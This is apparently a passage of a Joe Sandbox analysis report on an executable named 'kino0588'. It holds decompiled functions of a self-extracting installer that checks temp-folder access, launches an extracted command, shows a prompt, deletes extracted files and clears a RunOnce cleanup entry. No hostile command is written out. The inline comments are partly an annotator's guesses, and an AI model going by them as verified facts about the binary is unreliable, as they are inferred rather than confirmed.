                                                                                                                                                                                                                                    								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_push(_t29);
                                                                                                                                                                                                                                    							_t30 = E00192BFB(0x190000, 0, _t59); // executed
                                                                                                                                                                                                                                    							 *0x1981e0 = _t30;
                                                                                                                                                                                                                                    							__eflags =  *0x1981f8;
                                                                                                                                                                                                                                    							if( *0x1981f8 == 0) {
                                                                                                                                                                                                                                    								exit(_t30); // executed
                                                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							__eflags =  *0x1981e4;
                                                                                                                                                                                                                                    							if( *0x1981e4 == 0) {
                                                                                                                                                                                                                                    								__imp___cexit();
                                                                                                                                                                                                                                    								_t30 =  *0x1981e0; // 0x0
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                                                    							goto L40;
                                                                                                                                                                                                                                    							L32:
                                                                                                                                                                                                                                    							__eflags = _t41 - 0x22;
                                                                                                                                                                                                                                    							if(_t41 == 0x22) {
                                                                                                                                                                                                                                    								__eflags = _t54;
                                                                                                                                                                                                                                    								_t15 = _t54 == 0;
                                                                                                                                                                                                                                    								__eflags = _t15;
                                                                                                                                                                                                                                    								_t54 = 0 | _t15;
                                                                                                                                                                                                                                    								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                    							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                                                    							__imp___ismbblead(_t26);
                                                                                                                                                                                                                                    							__eflags = _t26;
                                                                                                                                                                                                                                    							if(_t26 != 0) {
                                                                                                                                                                                                                                    								_t59 = _t59 + 1;
                                                                                                                                                                                                                                    								__eflags = _t59;
                                                                                                                                                                                                                                    								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                                                    							}
							_t59 = _t59 + 1;
							 *(_t62 - 0x1c) = _t59;
						}
					}
					L40:
					return E0019724D(_t30);
				}
				_t58 = 1;
				__eflags = 1;
				goto L7;
			}

[Disassembly address column only, 0x00196a60 to 0x00196c3e; instruction text not present]

APIs
  • Part of subcall function 00197155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00197182
  • Part of subcall function 00197155: GetCurrentProcessId.KERNEL32 ref: 00197191
  • Part of subcall function 00197155: GetCurrentThreadId.KERNEL32 ref: 0019719A
  • Part of subcall function 00197155: GetTickCount.KERNEL32 ref: 001971A3
  • Part of subcall function 00197155: QueryPerformanceCounter.KERNEL32(?), ref: 001971B8
• GetStartupInfoW.KERNEL32(?,001972B8,00000058), ref: 00196A7F
• Sleep.KERNEL32(000003E8), ref: 00196AB4
• _amsg_exit.MSVCRT ref: 00196AC9
• _initterm.MSVCRT ref: 00196B1D
• __IsNonwritableInCurrentImage.LIBCMT ref: 00196B49
• exit.KERNELBASE ref: 00196BBF
• _ismbblead.MSVCRT ref: 00196BDA
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
• String ID:
• API String ID: 836923961-0
• Opcode ID: 6a9c495f45568dfc8fa3ca2c79c2a3ff608fd2ed9cc96d4c2a8b112998647bb4
• Instruction ID: e94b4b14f60f60705d7bca916d9ae2c3dd78e3d23dc163ffc96b09e3703158fc
• Opcode Fuzzy Hash: 6a9c495f45568dfc8fa3ca2c79c2a3ff608fd2ed9cc96d4c2a8b112998647bb4
• Instruction Fuzzy Hash: 4641DC31A583259FDF259B68DC15B6A77E4FB49720F64012BF842E36D0EB7488818BB1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph (graph not extracted; basic blocks 1958c8-19597b, calling LocalAlloc, CreateFileA, LocalFree, CloseHandle and GetFileAttributesA)
C-Code - Quality: 95%
			// Probes whether the directory named by __ecx is writable by creating a
			// delete-on-close temp file in it; returns 1 on success, 0 on failure.
			E001958C8(intOrPtr* __ecx) {
				void* _v8;
				intOrPtr _t6;
				void* _t10;
				void* _t12;
				void* _t14;
				signed char _t16;
				void* _t20;
				void* _t23;
				intOrPtr* _t27;
				CHAR* _t33;
				intOrPtr _t36;

				_push(__ecx);
				_t33 = __ecx;
				_t27 = __ecx;
				_t23 = __ecx + 1;
				do { // inline strlen: advance to the terminating NUL
					_t6 =  *_t27;
					_t27 = _t27 + 1;
				} while (_t6 != 0);
				_t36 = _t27 - _t23 + 0x14; // path length plus room for the probe file name
				_t20 = LocalAlloc(0x40, _t27 - _t23 + 0x14); // LPTR: movable, zero-initialised
				if(_t20 != 0) {
					// decompiled helpers that build "<dir>TMP4351$.TMP" in the buffer
					// (inferred from the CreateFileA argument trace below)
					E00191680(_t20, _t36, _t33);
					E0019658A(_t20, _t36, "TMP4351$.TMP");
					// GENERIC_WRITE, CREATE_NEW, FILE_ATTRIBUTE_NORMAL | FILE_FLAG_DELETE_ON_CLOSE
					_t10 = CreateFileA(_t20, 0x40000000, 0, 0, 1, 0x4000080, 0); // executed
					_v8 = _t10;
					LocalFree(_t20);
					_t12 = _v8;
					if(_t12 == 0xffffffff) { // INVALID_HANDLE_VALUE: directory not writable
						goto L4;
					} else {
						CloseHandle(_t12); // delete-on-close removes the probe file
						_t16 = GetFileAttributesA(_t33); // executed
						// fail unless the path exists and carries FILE_ATTRIBUTE_DIRECTORY (0x10)
						if(_t16 == 0xffffffff || (_t16 & 0x00000010) == 0) {
							goto L4;
						} else {
							 *0x199124 = 0; // clear the global status slot
							_t14 = 1;
						}
					}
				} else {
					E001944B9(0, 0x4b5, 0, 0, 0x10, 0); // decompiled subcall taken on allocation failure
					L4:
					 *0x199124 = E00196285(); // store the failure status returned by the subcall
					_t14 = 0;
				}
				return _t14;
			}

APIs
• LocalAlloc.KERNEL32(00000040,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00195534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 001958E7
• CreateFileA.KERNELBASE(00000000,40000000,00000000,00000000,00000001,04000080,00000000,TMP4351$.TMP,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00195534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00195943
• LocalFree.KERNEL32(00000000,?,00195534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 0019594D
• CloseHandle.KERNEL32(00000000,?,00195534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 0019595C
• GetFileAttributesA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00195534,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00195963
Strings
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: FileLocal$AllocAttributesCloseCreateFreeHandle
• String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$TMP4351$.TMP
• API String ID: 747627703-3705647674
• Opcode ID: 66893340c9cced94eb803d92e1f4fa65e7bf39a0976cb5be810471efb0104d6d
• Instruction ID: c1e2afc46589353ca7adb93bb9bbec2038af4fb19ca20d9f17f3c17967b6fa95
• Opcode Fuzzy Hash: 66893340c9cced94eb803d92e1f4fa65e7bf39a0976cb5be810471efb0104d6d
• Instruction Fuzzy Hash: 2A11087160021077DF245F796C4DB9B7E9EEF46374B10062AF505E31D1DB70984687E1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 631 193fef-194010 632 19410a-19411a call 196ce0 631->632 633 194016-19403b CreateProcessA 631->633 634 194041-19406e WaitForSingleObject GetExitCodeProcess 633->634 635 1940c4-194101 call 196285 GetLastError FormatMessageA call 1944b9 633->635 638 194091 call 19411b 634->638 639 194070-194077 634->639 647 194106 635->647 646 194096-1940b8 CloseHandle * 2 638->646 639->638 642 194079-19407b 639->642 642->638 645 19407d-194089 642->645 645->638 648 19408b 645->648 649 194108 646->649 650 1940ba-1940c0 646->650 647->649 648->638 649->632 650->649 651 1940c2 650->651 651->647
C-Code - Quality: 84%
E00193FEF(CHAR* __ecx, struct _STARTUPINFOA* __edx) {
	signed int _v8;
	char _v524;
	long _v528;
	struct _PROCESS_INFORMATION _v544;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t20;
	void* _t22;
	int _t25;
	intOrPtr* _t39;
	signed int _t44;
	void* _t49;
	signed int _t50;
	intOrPtr _t53;

	_t45 = __edx;
	_t20 =  *0x198004; // 0x21bd9a3c
	_v8 = _t20 ^ _t50;
	_t39 = __ecx;
	_t49 = 1;
	_t22 = 0;
	if(__ecx == 0) {
		L13:
		return E00196CE0(_t22, _t39, _v8 ^ _t50, _t45, 0, _t49);
	}
	asm("stosd");
	asm("stosd");
	asm("stosd");
	asm("stosd");
	_t25 = CreateProcessA(0, __ecx, 0, 0, 0, 0x20, 0, 0, __edx,  &_v544); // executed
	if(_t25 == 0) {
		 *0x199124 = E00196285();
		FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v524, 0x200, 0);
		_t45 = 0x4c4;
		E001944B9(0, 0x4c4, _t39,  &_v524, 0x10, 0);
		L11:
		_t49 = 0;
		L12:
		_t22 = _t49;
		goto L13;
	}
	WaitForSingleObject(_v544.hProcess, 0xffffffff);
	_t34 = GetExitCodeProcess(_v544.hProcess,  &_v528); // executed
	_t44 = _v528;
	_t53 =  *0x198a28; // 0x0
	if(_t53 == 0) {
		_t34 =  *0x199a2c; // 0x0
		if((_t34 & 0x00000001) != 0 && (_t34 & 0x00000002) == 0) {
			_t34 = _t44 & 0xff000000;
			if((_t44 & 0xff000000) == 0xaa000000) {
				 *0x199a2c = _t44;
			}
		}
	}
	E0019411B(_t34, _t44);
	CloseHandle(_v544.hThread);
	CloseHandle(_v544);
	if(( *0x199a34 & 0x00000400) == 0 || _v528 >= 0) {
		goto L12;
	} else {
		goto L11;
	}
}
0x00193fef
0x00193ffa
0x00194001
0x00194008
0x0019400a
0x0019400b
0x00194010
0x0019410a
0x0019411a
0x0019411a
0x0019401c
0x0019401d
0x0019401e
0x0019401f
0x00194033
0x0019403b
0x001940ca
0x001940e9
0x001940f8
0x00194101
0x00194106
0x00194106
0x00194108
0x00194108
0x00000000
0x00194108
0x00194049
0x0019405c
0x00194062
0x00194068
0x0019406e
0x00194070
0x00194077
0x0019407f
0x00194089
0x0019408b
0x0019408b
0x00194089
0x00194077
0x00194091
                                                                                                                                                                                                                                    0x0019409c
                                                                                                                                                                                                                                    0x001940a8
                                                                                                                                                                                                                                    0x001940b8
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001940c2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x001940c2

APIs
• CreateProcessA.KERNELBASE ref: 00194033
• WaitForSingleObject.KERNEL32(?,000000FF), ref: 00194049
• GetExitCodeProcess.KERNELBASE ref: 0019405C
• CloseHandle.KERNEL32(?), ref: 0019409C
• CloseHandle.KERNEL32(?), ref: 001940A8
• GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 001940DC
• FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 001940E9
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: CloseHandleProcess$CodeCreateErrorExitFormatLastMessageObjectSingleWait
• String ID:
• API String ID: 3183975587-0
• Opcode ID: a6102785fb9a2b076032dea499e9ac00cee100ebc9861d4797ff9b105eb496c0
• Instruction ID: d864c02da5a7081a4f802d1ba693a51f35f24e40c83599025b378ac0c9d284cd
• Opcode Fuzzy Hash: a6102785fb9a2b076032dea499e9ac00cee100ebc9861d4797ff9b105eb496c0
• Instruction Fuzzy Hash: B431BF31641218ABEF209F65DC49FAB777CEB95710F2001AAF605D25A1CB315DC6CB61
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph (graph image not preserved; legend: Executed / Not Executed)
C-Code - Quality: 100%
			E001951E5(void* __eflags) {
				int _t1;    // temporary not resolved by the decompiler: size passed to LocalAlloc
				int _t5;
				void* _t6;
				void* _t28;
				int _t29;   // temporary not resolved by the decompiler: buffer size passed to E0019468F

				// E0019468F reads a named resource (see subcall APIs: FindResourceA/LoadResource/memcpy_s);
				// with a NULL destination it returns the length of the "UPROMPT" resource.
				_t1 = E0019468F("UPROMPT", 0, 0) + 1; // 0x1
				_t28 = LocalAlloc(0x40, _t1);   // 0x40 = LPTR (fixed, zero-initialised)
				if(_t28 != 0) {
					if(E0019468F("UPROMPT", _t28, _t29) != 0) {
						_t5 = lstrcmpA(_t28, "<None>"); // executed
						if(_t5 != 0) {
							// E001944B9 wraps LoadStringA + MessageBoxA (see subcall APIs);
							// 0x20 | 4 = MB_ICONQUESTION | MB_YESNO, so the UPROMPT text is shown as a Yes/No prompt
							_t6 = E001944B9(0, 0x3e9, _t28, 0, 0x20, 4);
							LocalFree(_t28);
							if(_t6 != 6) {   // 6 = IDYES
								*0x199124 = 0x800704c7;   // HRESULT_FROM_WIN32(ERROR_CANCELLED)
								L10:
								return 0;
							}
							*0x199124 = 0;
							L6:
							return 1;
						}
						// resource text is "<None>": no prompt configured, continue without asking
						LocalFree(_t28);
						goto L6;
					}
					E001944B9(0, 0x4b1, 0, 0, 0x10, 0);   // 0x10 = MB_ICONERROR
					LocalFree(_t28);
					*0x199124 = 0x80070714;   // HRESULT_FROM_WIN32(ERROR_RESOURCE_DATA_NOT_FOUND)
					goto L10;
				}
				E001944B9(0, 0x4b5, 0, 0, 0x10, 0);
				*0x199124 = E00196285();   // E00196285 wraps GetLastError (see subcall APIs)
				goto L10;
			}

APIs
  • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946A0
  • Part of subcall function 0019468F: SizeofResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946A9
  • Part of subcall function 0019468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 001946C3
  • Part of subcall function 0019468F: LoadResource.KERNEL32(00000000,00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946CC
  • Part of subcall function 0019468F: LockResource.KERNEL32(00000000,?,00192D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 001946D3
  • Part of subcall function 0019468F: memcpy_s.MSVCRT ref: 001946E5
  • Part of subcall function 0019468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 001946EF
• LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00192F4D,?,00000002,00000000), ref: 00195201
• LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00195250
  • Part of subcall function 001944B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00194518
  • Part of subcall function 001944B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00194554
  • Part of subcall function 00196285: GetLastError.KERNEL32(00195BBC), ref: 00196285
Strings
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                                                                                                    • Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Resource$FindFreeLoadLocal$AllocErrorLastLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                                                                    • String ID: <None>$UPROMPT
                                                                                                                                                                                                                                    • API String ID: 957408736-2980973527
                                                                                                                                                                                                                                    • Opcode ID: 9fff34f7d5bb16f4bb3073badf16a7ae8d2ee64ddf6004fae8a754b65d0dc6d1
                                                                                                                                                                                                                                    • Instruction ID: 3e2a7c52aebc6cb830a1e505d3b72b8610a2bf63bae4ca7cd7b149f595ddef5c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9fff34f7d5bb16f4bb3073badf16a7ae8d2ee64ddf6004fae8a754b65d0dc6d1
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 351104B1200201BBEF156B755C49F3F619EEF99390B50403EF642E6690EB788C414279
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    C-Code - Quality: 74%
E001952B6(void* __ebx, char* __ecx, void* __edi, void* __esi) {
	signed int _v8;
	char _v268;
	signed int _t9;
	signed int _t11;
	void* _t21;
	void* _t29;
	CHAR** _t31;
	void* _t32;
	signed int _t33;

	_t28 = __edi;
	_t22 = __ecx;
	_t21 = __ebx;
	_t9 =  *0x198004; // 0x21bd9a3c
	_v8 = _t9 ^ _t33;
	_push(__esi);
	_t31 =  *0x1991e0; // 0x2818f08
	if(_t31 != 0) {
		_push(__edi);
		do {
			_t29 = _t31;
			if( *0x198a24 == 0 &&  *0x199a30 == 0) {
				SetFileAttributesA( *_t31, 0x80); // executed
				DeleteFileA( *_t31); // executed
			}
			_t31 = _t31[1];
			LocalFree( *_t29);
			LocalFree(_t29);
		} while (_t31 != 0);
		_pop(_t28);
	}
	_t11 =  *0x198a20; // 0x0
	_pop(_t32);
	if(_t11 != 0 &&  *0x198a24 == 0 &&  *0x199a30 == 0) {
		_push(_t22);
		E00191781( &_v268, 0x104, _t22, "C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\");
		if(( *0x199a34 & 0x00000020) != 0) {
			E001965E8( &_v268);
		}
		SetCurrentDirectoryA(".."); // executed
		_t22 =  &_v268;
		E00192390( &_v268);
		_t11 =  *0x198a20; // 0x0
	}
	if( *0x199a40 != 1 && _t11 != 0) {
		_t11 = E00191FE1(_t22); // executed
	}
	 *0x198a20 =  *0x198a20 & 0x00000000;
	return E00196CE0(_t11, _t21, _v8 ^ _t33, 0x104, _t28, _t32);
}

APIs
• SetFileAttributesA.KERNELBASE(02818F08,00000080,?,00000000), ref: 001952F2
• DeleteFileA.KERNELBASE(02818F08), ref: 001952FA
• LocalFree.KERNEL32(02818F08,?,00000000), ref: 00195305
• LocalFree.KERNEL32(02818F08), ref: 0019530C
• SetCurrentDirectoryA.KERNELBASE(001911FC,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 00195363
Strings
• C:\Users\user\AppData\Local\Temp\IXP003.TMP\, xrefs: 00195334
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: FileFreeLocal$AttributesCurrentDeleteDirectory
• String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\
• API String ID: 2833751637-256195474
• Opcode ID: a69f6742fde2efee921f9c8421b4d0ba3cad6493ce73a7fefa1c5442322bd1f3
                                                                                                                                                                                                                                    • Instruction ID: 1919be85bf1c68c0f7d5ad6825ac718ada76de4fdd141f035d59aad3d04785c2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a69f6742fde2efee921f9c8421b4d0ba3cad6493ce73a7fefa1c5442322bd1f3
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D21C031500614EBDF229B24EC09B6977B5FB14790F48016BF846A39A0CFB06EC8CB85
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

C-Code - Quality: 100%
	E00191FE1(void* __ecx) {
		void* _v8;
		long _t4;

		if( *0x198530 != 0) {
			_t4 = RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x20006,  &_v8); // executed
			if(_t4 == 0) {
				RegDeleteValueA(_v8, "wextract_cleanup3"); // executed
				return RegCloseKey(_v8);
			}
		}
		return _t4;
	}

Instruction addresses: 0x00191fee, 0x00192005, 0x0019200d, 0x00192017, 0x00000000, 0x00192020, 0x0019200d, 0x00192029

APIs
• RegOpenKeyExA.KERNELBASE(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,00020006,0019538C,?,?,0019538C), ref: 00192005
• RegDeleteValueA.KERNELBASE(0019538C,wextract_cleanup3,?,?,0019538C), ref: 00192017
• RegCloseKey.ADVAPI32(0019538C,?,?,0019538C), ref: 00192020
Strings
Memory Dump Source
• Source File: 00000003.00000002.330753364.0000000000191000.00000020.00000001.01000000.00000006.sdmp, Offset: 00190000, based on PE: true
• Associated: 00000003.00000002.330744972.0000000000190000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330761280.0000000000198000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000003.00000002.330767264.000000000019C000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_190000_kino0588.jbxd
Similarity
• API ID: CloseDeleteOpenValue
• String ID: Software\Microsoft\Windows\CurrentVersion\RunOnce$wextract_cleanup3
• API String ID: 849931509-2968168367
• Opcode ID: 6504a91e74980636c05e5ea54118e4cda8d8c444c9e73875358e36b11db5085d
• Instruction ID: 0ca91ff57f6cf1c29a907b1244716631ae53d0f8fd2daf617cd7ee999e5153f7
• Opcode Fuzzy Hash: 6504a91e74980636c05e5ea54118e4cda8d8c444c9e73875358e36b11db5085d
• Instruction Fuzzy Hash: 0EE08630550318FBEF219F90EC0AF6D7B29FB02740F580196F904E0460EB715E98D645
Uniqueness

Uniqueness Score: -1.00%

C-Code - Quality: 94%
	E00194CD0(char* __edx, long _a4, int _a8) {
		signed int _v8;
		char _v268;
		void* __ebx;
		void* __edi;
		void* __esi;
		signed int _t29;
		int _t30;
		long _t32;
		signed int _t33;
		long _t35;
		long _t36;
		struct HWND__* _t37;
		long _t38;
		long _t39;
		long _t41;
		long _t44;
		long _t45;
		long _t46;
		signed int _t50;
		long _t51;
		char* _t58;
		long _t59;
		char* _t63;
		long _t64;
		CHAR* _t71;
		CHAR* _t74;
		int _t75;
		signed int _t76;

		_t69 = __edx;
		_t29 =  *0x198004; // 0x21bd9a3c
		_t30 = _t29 ^ _t76;
		_v8 = _t30;
		_t75 = _a8;
		if( *0x1991d8 == 0) {
			_t32 = _a4;
			__eflags = _t32;
			if(_t32 == 0) {
				_t33 = E00194E99(_t75);
				L35:
				return E00196CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
			}
			_t35 = _t32 - 1;
			__eflags = _t35;
			if(_t35 == 0) {
				L9:
				_t33 = 0;
				goto L35;
			}
			_t36 = _t35 - 1;
			__eflags = _t36;
			if(_t36 == 0) {
				_t37 =  *0x198584; // 0x0
				__eflags = _t37;
				if(_t37 != 0) {
					SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
				}
				_t54 = 0x1991e4;
				_t58 = 0x1991e4;
				do {
					_t38 =  *_t58;
					_t58 =  &(_t58[1]);
					__eflags = _t38;
				} while (_t38 != 0);
				_t59 = _t58 - 0x1991e5;
				__eflags = _t59;
				_t71 =  *(_t75 + 4);
				_t73 =  &(_t71[1]);
				do {
					_t39 =  *_t71;
					_t71 =  &(_t71[1]);
                                                                                                                                                                                                                                    							__eflags = _t39;
                                                                                                                                                                                                                                    						} while (_t39 != 0);
                                                                                                                                                                                                                                    						_t69 = _t71 - _t73;
                                                                                                                                                                                                                                    						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                                                    						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                    						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                    							L3:
                                                                                                                                                                                                                                    							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                                                    							goto L35;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t69 = 0x1991e4;
                                                                                                                                                                                                                                    						_t30 = E00194702( &_v268, 0x1991e4,  *(_t75 + 4));
                                                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                                                    						if(__eflags == 0) {
                                                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t41 = E0019476D( &_v268, __eflags);
                                                                                                                                                                                                                                    						__eflags = _t41;
                                                                                                                                                                                                                                    						if(_t41 == 0) {
                                                                                                                                                                                                                                    							goto L9;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_push(0x180);
                                                                                                                                                                                                                                    						_t30 = E00194980( &_v268, 0x8302); // executed
                                                                                                                                                                                                                                    						_t75 = _t30;
                                                                                                                                                                                                                                    						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                    						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t30 = E001947E0( &_v268);
                                                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                                                    						if(_t30 == 0) {
                                                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						 *0x1993f4 =  *0x1993f4 + 1;
                                                                                                                                                                                                                                    						_t33 = _t75;
                                                                                                                                                                                                                                    						goto L35;
                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                    					_t44 = _t36 - 1;
                                                                                                                                                                                                                                    					__eflags = _t44;
                                                                                                                                                                                                                                    					if(_t44 == 0) {
                                                                                                                                                                                                                                    						_t54 = 0x1991e4;
                                                                                                                                                                                                                                    						_t63 = 0x1991e4;
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t45 =  *_t63;
                                                                                                                                                                                                                                    							_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                    							__eflags = _t45;
                                                                                                                                                                                                                                    						} while (_t45 != 0);
                                                                                                                                                                                                                                    						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                                                    						_t64 = _t63 - 0x1991e5;
                                                                                                                                                                                                                                    						__eflags = _t64;
                                                                                                                                                                                                                                    						_t69 =  &(_t74[1]);
                                                                                                                                                                                                                                    						do {
                                                                                                                                                                                                                                    							_t46 =  *_t74;
                                                                                                                                                                                                                                    							_t74 =  &(_t74[1]);
                                                                                                                                                                                                                                    							__eflags = _t46;
                                                                                                                                                                                                                                    						} while (_t46 != 0);
                                                                                                                                                                                                                                    						_t73 = _t74 - _t69;
                                                                                                                                                                                                                                    						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                                                    						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                    						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                    							goto L3;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t69 = 0x1991e4;
                                                                                                                                                                                                                                    						_t30 = E00194702( &_v268, 0x1991e4,  *(_t75 + 4));
                                                                                                                                                                                                                                    						__eflags = _t30;
                                                                                                                                                                                                                                    						if(_t30 == 0) {
